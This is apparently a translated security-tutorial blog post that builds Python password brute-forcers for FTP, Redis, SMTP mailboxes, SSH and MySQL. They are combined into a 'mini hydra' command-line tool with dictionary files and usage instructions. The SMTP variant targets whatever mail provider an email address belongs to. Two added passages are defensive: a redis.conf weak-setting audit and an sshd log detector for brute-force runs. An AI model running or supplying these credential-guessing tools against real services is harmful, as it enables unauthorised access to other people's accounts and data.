Day 159: Secure Development - Python - Brute Forcing with Protocol Libraries: FTP, SSH, Redis, SMTP, MySQL and more

Contents

Case 1: Python - file-transfer brute forcing - using the ftplib library for the FTP protocol

Case 2: Python - database brute forcing - using the redis library for the Redis protocol

Case 3: Python - mail brute forcing - using the smtplib library for the SMTP protocol

Case 4: Python - login brute forcing - using the paramiko library for the SSH protocol

Case 5: Python - database brute forcing - using the pymysql library for the MySQL protocol

Case 6: Python - combined brute forcing - a mini hydra


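Case 1: Python - file-transfer brute forcing - using the ftplib library for the FTP protocol

Start an FTP server.

FTP answers a successful login differently from a failed one, and the check relies on that difference.

Test it with the ftplib library.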

```python
from ftplib import FTP

# FTP server address
ftp_server = '192.168.172.132'
# FTP server port (default 21)
ftp_port = 21
# FTP login user name
ftp_user = 'root'
# FTP login password
ftp_pass = '123.comm'

ftp = FTP()
ftp.connect(ftp_server, ftp_port)
ftp.login(ftp_user, ftp_pass)  # raises ftplib.error_perm when the login is rejected
```

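Success

Failure

On top of this, looping over a dictionary is enough to brute-force the password.

Program that brute-forces FTP account passwords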

```python
from ftplib import FTP
import sys

def ftp_check(ip, port, username, password):
    # One connection per attempt; login() raises when the credentials are rejected
    ftp = FTP()
    ftp.connect(ip, port)
    try:
        ftp.login(username, password)
        print(username + "|" + password + "-->success")
        sys.exit()
    except Exception as e:
        print(username + "|" + password + "-->failed")
    finally:
        ftp.close()

if __name__ == '__main__':
    ip = input("please input ip:")
    port = int(input("please input port:"))
    # Try every password for every user name in the two dictionaries
    with open('.\\conf\\dic_username_ftp.txt', 'r') as user_file:
        names = user_file.readlines()
        for name in names:
            name = name.replace("\n", "")
            with open('.\\conf\\dic_password_ftp.txt', 'r') as pass_file:
                passwords = pass_file.readlines()
                for password in passwords:
                    password = password.replace("\n", "")
                    ftp_check(ip, port, name, password)
```

Run result

If the output is too noisy, the failed attempts can be left unprinted.

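Case 2: Python - database brute forcing - using the redis library for the Redis protocol

Start Redis; it listens on port 6379.

Configure a password.

Try connecting. Redis has no notion of accounts; connecting with just the password is enough.

Once connected, a key can be set. The check uses this: if the connection did not succeed, the set raises an error.

This is needed because merely creating the connection raises no error, even when it does not succeed.

Brute-force program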

```python
import redis
import sys

def redis_check(ip, password):
    try:
        # Creating the client does not contact the server; the first command does
        conn = redis.Redis(host=ip, port=6379, password=password, db=0)
        conn.set("test", "123")
        print(password + "-->success")
        conn.delete("test")
        sys.exit()
    except Exception as e:
        print(password + "-->failed")

if __name__ == "__main__":
    ip = input("please input ip:")
    with open(".\\conf\\dic_password_redis.txt", "r") as file:
        passwords = file.readlines()
        for password in passwords:
            password = password.replace("\n", "")
            redis_check(ip, password)
```

Run result
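Because a single password on port 6379 is all that stands between a client and the data in this case, the server's own configuration decides how exposed it is. The following is an added example, not part of the original post: a small audit of `redis.conf` text for the settings that matter here. Both configuration fragments are constructed, and the minimum password length is an assumed policy value.

```python
# Constructed redis.conf fragments for illustration (not from the original page).
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
requirepass 123456
"""
HARDENED_CONF = """\
bind 127.0.0.1 192.168.172.132
protected-mode yes
port 6379
requirepass c9V2rT8mQ4xL0bN6yH3kW7pZ1sD5fG9j
"""
MIN_PASSWORD_LEN = 32  # assumed policy value, not a Redis default


def parse_conf(text):
    """Return {directive: value}; later lines override earlier ones."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            conf[key.lower()] = value.strip().strip('"')
    return conf


def audit_redis_conf(text):
    """Return (directive, finding) pairs for settings that leave password guessing open."""
    conf = parse_conf(text)
    findings = []
    password = conf.get("requirepass", "")
    if not password:
        findings.append(("requirepass", "no password: every client that connects is trusted"))
    elif len(password) < MIN_PASSWORD_LEN:
        findings.append(("requirepass", f"password is only {len(password)} characters long"))
    # With no bind directive Redis listens on every interface
    addresses = [a.lstrip("-") for a in conf.get("bind", "").split()]
    if not addresses or any(a in ("0.0.0.0", "::", "*") for a in addresses):
        findings.append(("bind", "reachable on all network interfaces"))
    if conf.get("protected-mode", "yes") == "no":
        findings.append(("protected-mode", "protected mode is switched off"))
    return findings
```

`audit_redis_conf(WEAK_CONF)` reports all three directives, while `audit_redis_conf(HARDENED_CONF)` returns an empty list.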

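Case 3: Python - mail brute forcing - using the smtplib library for the SMTP protocol

SMTP is handled with the smtplib library. An SMTP mailbox can be logged in to with an authorization code in place of the password.

The mail provider has to be worked out from the suffix of the address.

Code; a failed login raises an exception.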

```python
import smtplib
import sys

def email_check(email, password):
    # Derive the SMTP host from the domain part of the address
    smtp_split = email.split("@")[1]
    smtp_server = 'smtp.' + smtp_split
    #print(smtp_server)
    smtp_port = 25  # 25 is the SMTP port
    try:
        smtp_conn = smtplib.SMTP()
        smtp_conn.connect(smtp_server, smtp_port)
        smtp_conn.login(email, password)
        print("password is " + password + ' --> ok')
        sys.exit()
    except Exception as e:
        pass
        #print("error")


if __name__ == "__main__":
    email = input("please input your email:")
    with open(".\\conf\\dic_password_email.txt", "r") as file:
        passwords = file.readlines()
        for password in passwords:
            password = password.replace("\n", "")
            email_check(email, password)
```

Run result

Case 4: Python - login brute forcing - using the paramiko library for the SSH protocol

SSH connections are made with the paramiko library.

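```python
import paramiko

# Create the SSH client
client = paramiko.SSHClient()
# Automatically accept and add the host name and key of unknown hosts (no host-key verification)
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Connect to the remote host; the string values are placeholders for
# the remote host IP, the user name and the password
client.connect('远程主机IP', port=22, username='用户名', password='密码')
```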

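A successful connection raises no error.

A failed one raises an exception.

Code; the port is the second argument to connect and defaults to 22.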

```python
import paramiko, time
import sys

def ssh_check(ip, username, password):
    print(username + "  |  " + password + "")
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # Port is left at paramiko's default of 22
        client.connect(ip, username=username, password=password)
        print(username + "  |  " + password + "--> success")
        sys.exit()
    except Exception as e:
        # Pause for a second after each failed attempt
        time.sleep(1)
    finally:
        client.close()

if __name__ == '__main__':
    ip = input("please input ip:")
    with open('.\\conf\\dic_username_ssh.txt', 'r') as user_file:
        names = user_file.readlines()
        for name in names:
            name = name.replace("\n", "")
            with open('.\\conf\\dic_password_ssh.txt', 'r') as pass_file:
                passwords = pass_file.readlines()
                for password in passwords:
                    password = password.replace("\n", "")
                    ssh_check(ip, name, password)
```

Run result
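Seen from the defending side, the loop in this case leaves a recognizable trail in the target's sshd log: a run of failed passwords from one address, about one per second, possibly ending in an accepted one. The following is an added example, not part of the original post, that flags that pattern with a sliding window. The log lines are constructed in OpenSSH's message format, and the threshold, window and year are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in OpenSSH auth.log format (not captured from a real host).
SAMPLE_LOG = """\
Dec 20 10:15:01 srv sshd[2101]: Failed password for root from 192.168.172.1 port 50112 ssh2
Dec 20 10:15:02 srv sshd[2103]: Failed password for root from 192.168.172.1 port 50114 ssh2
Dec 20 10:15:03 srv sshd[2105]: Failed password for invalid user admin from 192.168.172.1 port 50116 ssh2
Dec 20 10:15:03 srv sshd[2106]: Failed password for jie from 10.0.0.5 port 40022 ssh2
Dec 20 10:15:04 srv sshd[2107]: Failed password for invalid user admin from 192.168.172.1 port 50118 ssh2
Dec 20 10:15:05 srv sshd[2109]: Failed password for jie from 192.168.172.1 port 50120 ssh2
Dec 20 10:15:06 srv sshd[2111]: Failed password for jie from 192.168.172.1 port 50122 ssh2
Dec 20 10:15:07 srv sshd[2113]: Accepted password for jie from 192.168.172.1 port 50124 ssh2
Dec 20 10:15:20 srv sshd[2120]: Accepted password for jie from 10.0.0.5 port 40030 ssh2
"""
ASSUMED_YEAR = 2024  # syslog timestamps carry no year; a fixed one is assumed
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def detect_bruteforce(log_text, max_failures=5, window=timedelta(seconds=60)):
    """Return {ip: {"peak", "users", "compromised"}} for sources over the threshold."""
    failures = defaultdict(deque)  # ip -> failure timestamps still inside the window
    tried = defaultdict(set)       # ip -> every user name that failed from it
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{ASSUMED_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user, q = m["ip"], m["user"], failures[m["ip"]]
        while q and ts - q[0] > window:
            q.popleft()  # forget failures that have aged out of the window
        if m["result"] == "Failed":
            q.append(ts)
            tried[ip].add(user)
            if len(q) >= max_failures:
                alert = alerts.setdefault(ip, {"peak": 0, "users": tried[ip], "compromised": []})
                alert["peak"] = max(alert["peak"], len(q))
        elif ip in alerts:
            # A success from an already flagged source: treat the account as compromised
            alerts[ip]["compromised"].append(user)
    return alerts
```

On the sample, only 192.168.172.1 is flagged, with `jie` listed as compromised; the single mistyped password from 10.0.0.5 stays below the threshold.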

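Case 5: Python - database brute forcing - using the pymysql library for the MySQL protocol

Create a user that is allowed to log in remotely: jie / 123.com

```sql
CREATE USER 'jie'@'%' IDENTIFIED BY '123.com';
GRANT ALL PRIVILEGES ON *.* TO 'jie'@'%';
FLUSH PRIVILEGES;
```

The connection succeeds.

Establish a MySQL connection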

```python
import mysql.connector
# pip install mysql-connector-python installs this library

# Create the database connection
db = mysql.connector.connect(
    host="192.168.172.132",  # MySQL server address
    port=3306,
    user="jie",   # user name
    password="123.comm",  # password
    database="mysql"  # database name
)
```

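Install the required library.

A connection with wrong credentials raises an error.

The MySQL brute-forcer is written on top of this.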

```python
import mysql.connector
import sys

def mysql_check(ip, port, username, password):
    try:
        db = mysql.connector.connect(
            host=ip,  # MySQL server address
            port=port,
            user=username,   # user name
            password=password,  # password
            database="mysql"  # database name
        )
        print(username + " | " + password + "-->  success")
        db.close()
        sys.exit()
    except Exception as e:
        pass

if __name__ == '__main__':
    ip = input("please input ip:")
    port = int(input("please input port:"))
    # The FTP dictionaries are reused here
    with open('.\\conf\\dic_username_ftp.txt', 'r') as user_file:
        names = user_file.readlines()
        for name in names:
            name = name.replace("\n", "")
            with open('.\\conf\\dic_password_ftp.txt', 'r') as pass_file:
                passwords = pass_file.readlines()
                for password in passwords:
                    password = password.replace("\n", "")
                    mysql_check(ip, port, name, password)
```

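Run result

Case 6: Python - combined brute forcing - a mini hydra

To pass arguments on the command line after the script name, as in `python xx.py 123456`, import the sys library and read them with sys.argv[1].

The values can then be given after the file name, as shown in the figure below.

Code. Most of the functionality is implemented. The one limitation is with custom dictionaries: when a protocol needs fewer than 5 arguments, numbers must be passed as placeholders, because the script cannot work out how many arguments were given and otherwise raises an error.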

```python
from ftplib import FTP
import paramiko, time
import mysql.connector
import smtplib
import redis
import sys

def ftp_check(ip, port, username, password):
    ftp = FTP()
    ftp.connect(ip, port)
    try:
        ftp.login(username, password)
        print(username + "|" + password + "-->success")
        sys.exit()
    except Exception as e:
        pass
        #print(username+"|"+password+"-->failed")
    finally:
        ftp.close()


def ssh_check(ip, username, password):
    print(username + "  |  " + password + "")
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(ip, username=username, password=password)
        print(username + "  |  " + password + "--> success")
        sys.exit()
    except Exception as e:
        # Pause for a second after each failed attempt
        time.sleep(1)
    finally:
        client.close()


def mysql_check(ip, port, username, password):
    try:
        db = mysql.connector.connect(
            host=ip,  # MySQL server address
            port=port,
            user=username,   # user name
            password=password,  # password
            database="mysql"  # database name
        )
        print(username + " | " + password + "-->  success")
        sys.exit()
    except Exception as e:
        pass


def email_check(email, password):
    smtp_split = email.split("@")[1]
    smtp_server = 'smtp.' + smtp_split
    smtp_port = 25  # 25 is the SMTP port
    try:
        smtp_conn = smtplib.SMTP()
        smtp_conn.connect(smtp_server, smtp_port)
        smtp_conn.login(email, password)
        print("password is " + password + ' --> ok')
        sys.exit()
    except Exception as e:
        pass
        #print("error")

def redis_check(ip, password):
    try:
        conn = redis.Redis(host=ip, port=6379, password=password, db=0)
        conn.set("test", "123")
        print(password + "-->success")
        conn.delete("test")
        sys.exit()
    except Exception as e:
        pass

if __name__ == "__main__":
    if len(sys.argv) <= 2:
        # Usage with the built-in dictionaries
        print('eg:固定字典使用说明:')
        print('python hydra.py ftp ip port')
        print('python hydra.py ssh ip')
        print('python hydra.py redis ip')
        print('python hydra.py mysql ip port')
        print('python hydra.py email xxxx@qq.com')
        # Usage with custom dictionaries
        print('eg:自定义字典使用说明:')
        print('python hydra.py ftp ip port user.txt pass.txt')
        print('python hydra.py ssh ip port user.txt pass.txt')
        print('python hydra.py redis ip 1 2 pass.txt')
        print('python hydra.py mysql ip port user.txt pass.txt')
        print('python hydra.py email xx@qq.com 2 3 pass.txt')
        sys.exit()
    xy = sys.argv[1]   # protocol name
    ip = sys.argv[2]   # target IP, or the mailbox address for "email"
    if len(sys.argv) > 3:
        port = sys.argv[3]
        port = int(port)
    if len(sys.argv) > 5:
        # Both dictionary paths are needed, so argv[5] must exist
        usertxt = sys.argv[4]
        passtxt = sys.argv[5]
    try:
        # usertxt exists only when custom dictionaries were given; otherwise the
        # NameError raised here hands control to the built-in dictionaries below
        if usertxt is not None:
            if xy == "ftp":
                with open(usertxt, 'r') as file:
                    names = file.readlines()
                    for name in names:
                        name = name.replace("\n", "")
                        print(name)
                        with open(passtxt, 'r') as file:
                            passwords = file.readlines()
                            for password in passwords:
                                password = password.replace("\n", "")
                                ftp_check(ip, port, name, password)
            elif xy == "ssh":
                with open(usertxt, 'r') as file:
                    names = file.readlines()
                    for name in names:
                        name = name.replace("\n", "")
                        with open(passtxt, 'r') as file:
                            passwords = file.readlines()
                            for password in passwords:
                                password = password.replace("\n", "")
                                ssh_check(ip, name, password)
            elif xy == "redis":
                with open(passtxt, "r") as file:
                    passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n", "")
                        redis_check(ip, password)
            elif xy == "mysql":
                with open(usertxt, 'r') as file:
                    names = file.readlines()
                    for name in names:
                        name = name.replace("\n", "")
                        print(name)
                        with open(passtxt, 'r') as file:
                            passwords = file.readlines()
                            for password in passwords:
                                password = password.replace("\n", "")
                                mysql_check(ip, port, name, password)
            elif xy == "email":
                email = ip
                print(email)
                with open(passtxt, "r") as file:
                    passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n", "")
                        email_check(email, password)
    except Exception as e:
        # Fallback: the built-in dictionaries under .\conf
        try:
            if xy == "ftp":
                with open('.\\conf\\dic_username_ftp.txt', 'r') as file:
                    names = file.readlines()
                    for name in names:
                        name = name.replace("\n", "")
                        with open('.\\conf\\dic_password_ftp.txt', 'r') as file:
                            passwords = file.readlines()
                            for password in passwords:
                                password = password.replace("\n", "")
                                ftp_check(ip, port, name, password)
            elif xy == "ssh":
                with open('.\\conf\\dic_username_ssh.txt', 'r') as file:
                    names = file.readlines()
                    for name in names:
                        name = name.replace("\n", "")
                        with open('.\\conf\\dic_password_ssh.txt', 'r') as file:
                            passwords = file.readlines()
                            for password in passwords:
                                password = password.replace("\n", "")
                                ssh_check(ip, name, password)
            elif xy == "redis":
                with open(".\\conf\\dic_password_redis.txt", "r") as file:
                    passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n", "")
                        redis_check(ip, password)
            elif xy == "mysql":
                with open('.\\conf\\dic_username_ftp.txt', 'r') as file:
                    names = file.readlines()
                    for name in names:
                        name = name.replace("\n", "")
                        with open('.\\conf\\dic_password_ftp.txt', 'r') as file:
                            passwords = file.readlines()
                            for password in passwords:
                                password = password.replace("\n", "")
                                mysql_check(ip, 3306, name, password)
            elif xy == "email":
                email = ip
                print(email)
                with open(".\\conf\\dic_password_email.txt", "r") as file:
                    passwords = file.readlines()
                    for password in passwords:
                        password = password.replace("\n", "")
                        email_check(email, password)
        except Exception as e:
            pass
```

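Run result

Usage hint when no arguments are given

FTP brute forcing without a custom dictionary

SSH brute forcing without a custom dictionary

Redis brute forcing without a custom dictionary

MySQL brute forcing without a custom dictionary

Mailbox brute forcing without a custom dictionary

FTP brute forcing with custom dictionaries

SSH brute forcing with custom dictionaries. Here I set port 22 as the default and pass 1 as a numeric placeholder; it has no real effect, and the code can be modified so that it changes the port.

Redis brute forcing with a custom dictionary

MySQL brute forcing with custom dictionaries

Mailbox brute forcing with a custom dictionary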
